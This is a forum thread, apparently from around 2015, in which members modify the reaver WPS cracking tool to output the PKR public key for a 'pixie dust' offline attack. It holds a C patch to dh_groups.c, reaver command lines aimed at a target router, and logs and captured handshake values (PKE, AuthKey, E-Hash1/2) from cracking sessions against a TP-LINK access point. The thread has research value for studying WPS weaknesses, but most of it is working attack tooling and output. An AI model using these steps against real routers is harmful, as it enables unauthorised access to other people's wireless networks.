PKE:ac:e6:d0:a0:d3:17:7b:b0:d0:69:bc:37:23:d9:1a:2 e:dc:cb:8d:e7:de:fe:22:89:04:1e:34:5d:1d:f9:5a:25: b4:15:0f:43:c3:b2:22:97:4c:b6:8f:ec:9d:31:91:0a:76 :bc:20:98:d6:22:db:71:dc:82:6d:df:8c:19:12:6d:ad:0 f:3a:88:54:83:68:97:ae:27:18:39:84:f5:46:15:4f:f7: 38:20:60:80:56:42:76:48:d6:d3:b8:79:88:56:ca:4d:d5 :29:1a:47:1c:78:0d:31:fb:aa:23:fb:03:ee:cf:be:77:b f:2e:7d:f2:06:2d:11:f9:47:20:97:08:79:c3:47:1c:13: 58:cd:35:a1:76:a3:eb:71:14:c4:7e:39:7a:e5:15:95:b1 :fa:40:7d:b0:e2:e4:8a:af:eb:de:67:5e:c6:05:0d:3d:1 3:9d:9c:49:c4:46:a1:92:60:d7:27:a4:e2:b1:6d:52:79: da:29:c7:45:93:13:0b:e4:28:b5
AuthKey: b8:e6:b4:e6:73:e1:92:32:e1:87:11:d6:0c:10:0e:3f:05 :d4:b8:6c:0d:53:b8:50:c5:3f:d2:95:1f:6a:ab:98
E-Hash1: 6b:f2:06:6b:dd:ce:f7:4c:42:df:62:d8:60:3b:3b:2d:b9 :da:8e:da:d6:f5:df:b4:a7:2f:a2:c6:bd:61:61:87
E-Hash2: d7:e2:ce:c5:2f:0d:b4:8e:f3:a6:19:ee:38:d7:19:55:1a :ef:3a:7f:ab:93:e5:0c:df:fe:cf:bb:f1:ab:06:74
Junior Member
Is this helpful?
Code:diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c --- a/src/crypto/dh_groups.c +++ b/src/crypto/dh_groups.c @@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_ wpabuf_put(pv, pv_len); wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv); + printf("[P] PKR: "); + int pixiecnt = 0; + const u8 *pkr = wpabuf_head_u8(pv); + for (; pixiecnt < 192; pixiecnt++) { + printf("%02x", pkr[pixiecnt]); + if (pixiecnt != 191) { + printf(":"); + } + } + printf("\n"); + return pv; }
Senior Member
@someone_else Thanks for all the data! I've added it
Member
Hi t6_x, would it be possible for you to post this version of reaver?This is a example
[+] Switching mon0 to channel 9
[?] Restore previous session for 64:70:02:53
[+] Waiting for beacon from 64:70:02:53
[+] Associated with 64:70:02:53
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
[P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3 :88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:1 8:45:.......
[+] Sending M2 message
[P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
[P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
Senior Member
I'll upload the new reaver tomorrow when I get a chance
Senior Member
Yeah that's what we've been looking for! Thanks!
Member
Thank you very much soxrok2212.I'll upload the new reaver tomorrow when I get a chance
Senior Member
New reaver and pixiewps, good times
Senior Member
For the modded reaver for pixiedust
You can separate out the pixiedust data and write directly to a file as follows:
If you include the -o <filename> command in the reaver command line:
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01
reaver will write to file all data not preceeded with [P] to pixietest01
reaver will write data proceeded with [P] to screen not to file
The data proceeded by [P] though is the data required for a pixiedust attack.
Therefore:
To write only pixiedust data to a file use the following:
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01 | tee pixiedust02
In this case:
Non pixiedust data will be written to pixiedust01
Pixiedust data only will be written to both screen and the file pixiedust02
Musket Teams
Last edited by mmusket33; 2015-04-12 at 10:57.
Senior Member
To soxrox2212
MTeams modded the /src/crypto/dh_groups.c file as suggested by Espresso above .
We reinstalled reaver and ran tests.
The --pkr variable is the provided thru reaver along with the --pke etc
The mod is inserted below line 606
Line 606 = wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
wpabuf_put(pv, pv_len);
wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
/******** ADD THIS PART ******/
printf("[P] PKR: ");
int pixiecnt = 0;
const u8 *pkr = wpabuf_head_u8(pv);
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", pkr[pixiecnt]);
if (pixiecnt != 191) {
printf(":");
}
}
printf("\n");
/*** END ADD THIS PART END ***/
return pv;
}
We will send you an automated script soon. We are currently using it, but the addition of a --pkr variable provided by reaver has caused us to have to add this choice into the menu so there will be a delay.
MTeams
Posting Permissions
